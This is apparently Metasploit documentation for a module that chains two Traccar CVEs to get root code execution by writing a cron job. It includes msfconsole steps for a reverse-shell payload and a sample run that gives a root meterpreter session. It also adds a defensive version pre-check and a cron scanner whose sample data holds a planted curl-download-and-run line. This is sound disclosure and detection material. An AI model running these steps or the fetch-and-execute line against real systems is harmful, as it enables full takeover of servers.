
Traccar Rce Upload

documentation/modules/exploit/linux/http/traccar_rce_upload.md


Vulnerable Application

This module chains two vulnerabilities in Traccar v5.1 - v5.12 to obtain remote code execution: a path traversal (CVE-2024-24809) and an unrestricted file upload (CVE-2024-31214). By default the application allows self-registration, so any user can create an account and reach the vulnerable functionality without prior access. The application also runs as root by default, so successful exploitation typically results in a complete system compromise. The module exploits these issues by writing a new cron job file that executes the specified payload; it should work on any Red Hat-based Linux system.
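The module's automatic check has to establish the two preconditions described above before it touches the target: a version in the affected range and self-registration enabled. The following is an added, stand-alone example of such a pre-check (it is not the Metasploit module's own code). It assumes that Traccar's `GET /api/server` endpoint answers without authentication and returns a JSON object carrying `version` and `registration` fields; the sample responses below are constructed, not captured from a real host.

```python
"""Pre-check for the two conditions the Traccar RCE module relies on.

Added example, not part of the Metasploit module. Assumes GET /api/server
is reachable unauthenticated and returns JSON with "version" and
"registration" fields.
"""
import json
import re
import urllib.request

# Affected range stated by the module documentation: v5.1 through v5.12.
AFFECTED_MIN = (5, 1)
AFFECTED_MAX = (5, 12)


def parse_version(version):
    """Return (major, minor) from strings such as '5.12' or '5.12-SNAPSHOT'.

    Returns None when the string does not start with a dotted number pair.
    """
    m = re.match(r"\s*(\d+)\.(\d+)", version or "")
    return (int(m.group(1)), int(m.group(2))) if m else None


def assess(server_json):
    """Evaluate the body of /api/server.

    Returns a dict with the parsed version, whether it lies in the affected
    5.1-5.12 range, whether self-registration is on, and whether both hold,
    which is the condition for an unauthenticated attacker to exploit.
    """
    info = json.loads(server_json)
    ver = parse_version(info.get("version"))
    in_range = ver is not None and AFFECTED_MIN <= ver <= AFFECTED_MAX
    registration = bool(info.get("registration", False))
    return {
        "version": ver,
        "affected_version": in_range,
        "self_registration": registration,
        "unauthenticated_exploitable": in_range and registration,
    }


def check_host(base_url, timeout=5):
    """Fetch /api/server from a live instance (e.g. http://host:8082) and assess it."""
    url = base_url.rstrip("/") + "/api/server"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return assess(resp.read().decode("utf-8"))


# Constructed sample responses (the field subset this check cares about).
SAMPLE_VULNERABLE = json.dumps({"id": 1, "registration": True, "version": "5.12"})
SAMPLE_PATCHED = json.dumps({"id": 1, "registration": True, "version": "6.0"})
SAMPLE_NO_REGISTRATION = json.dumps({"id": 1, "registration": False, "version": "5.11"})

if __name__ == "__main__":
    for label, body in (
        ("5.12, registration on", SAMPLE_VULNERABLE),
        ("6.0, registration on", SAMPLE_PATCHED),
        ("5.11, registration off", SAMPLE_NO_REGISTRATION),
    ):
        print(label, "->", assess(body))
```

Against a live host, `check_host("http://TARGET:8082")` performs the same evaluation on the real response. A version in range with `registration` false still leaves the issues exploitable by any existing account, so the two flags are reported separately.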

Testing

The software can be obtained from the vendor.

Installation instructions are available in the vendor's documentation.

The vulnerable application runs by default on Eclipse Jetty, which listens on TCP port 8082.

Successfully tested on

  • Traccar v5.12 on Rocky Linux 9.4
  • Traccar v5.11 on Rocky Linux 9.4

Verification Steps

  1. Install and run the application
  2. Start msfconsole and run the following commands:
msf > use exploit/linux/http/traccar_rce_upload  
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/traccar_rce_upload) > set RHOSTS <IP>
msf exploit(linux/http/traccar_rce_upload) > set LHOST <IP>
msf exploit(linux/http/traccar_rce_upload) > exploit

You should get a meterpreter session in the context of root.

Options

USERNAME

Username to be used when creating a new user.

PASSWORD

Password for the new user.

EMAIL

E-mail for the new user.

Scenarios

Running the exploit against Traccar v5.12 on Rocky Linux 9.4, using curl as a fetch command, should result in an output similar to the following:

msf exploit(linux/http/traccar_rce_upload) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] Authenticating...
[*] Adding new device...
[*] Uploading crontab file...
[*] Cronjob successfully written - waiting for execution...
[*] Sending stage (3045380 bytes) to 192.168.217.138
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.138:58196) at 2024-08-25 17:03:02 -0400
[*] Exploit finished, check thy shell.

meterpreter > sysinfo 
Computer     : localhost.localdomain
OS           : Red Hat 9.4 (Linux 5.14.0-427.13.1.el9_4.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

meterpreter > getuid 
Server username: root
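The artifact this module leaves behind is a cron job file that fetches and runs the payload (the scenario above uses curl as the fetch command). As an added example, not part of the Metasploit module, the following POSIX shell script flags entries in a cron.d-style directory that invoke curl or wget against an http(s) URL. The directory contents are constructed here to stand in for /etc/cron.d; on a real host, point `scan_cron_dir` at /etc/cron.d instead.

```sh
#!/bin/sh
# Added example (not part of the Metasploit module): flag cron entries that
# download content over HTTP(S), the shape of the job this module plants.
# The sample directory below is constructed, not taken from a real system.

# Print "file:line:entry" for every non-comment cron line that calls curl or
# wget with an http(s) URL. Exit status 0 when at least one entry was found,
# 1 otherwise.
scan_cron_dir() {
    dir="$1"
    hits=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        # Lines beginning with '#' are comments and never match because the
        # leading [^#]* cannot step over the '#'.
        matches=$(grep -En '^[^#]*(curl|wget)[[:space:]][^#]*https?://' "$f") || continue
        printf '%s\n' "$matches" | sed "s|^|$f:|"
        hits=$((hits + 1))
    done
    [ "$hits" -gt 0 ]
}

# Build a constructed stand-in for /etc/cron.d and print its path.
make_sample_cron_dir() {
    d=$(mktemp -d)
    # legitimate distribution entry
    printf '0 1 * * * root run-parts /etc/cron.daily\n' > "$d/0hourly"
    # planted entry: fetch a stager over HTTP, mark it executable, run it
    printf '* * * * * root curl -so /tmp/x http://192.0.2.10:8080/x; chmod +x /tmp/x; /tmp/x &\n' > "$d/device"
    # commented-out fetch, must not be reported
    printf '# curl http://example.invalid/ disabled\n' > "$d/disabled"
    printf '%s\n' "$d"
}

SAMPLE_DIR=$(make_sample_cron_dir)
scan_cron_dir "$SAMPLE_DIR"
```

The check is deliberately narrow: it only catches fetch-style jobs. Pair it with a package-ownership check (`rpm -qf` on Red Hat-based systems) on any file under /etc/cron.d that no package claims, since a planted job could just as well embed its payload inline.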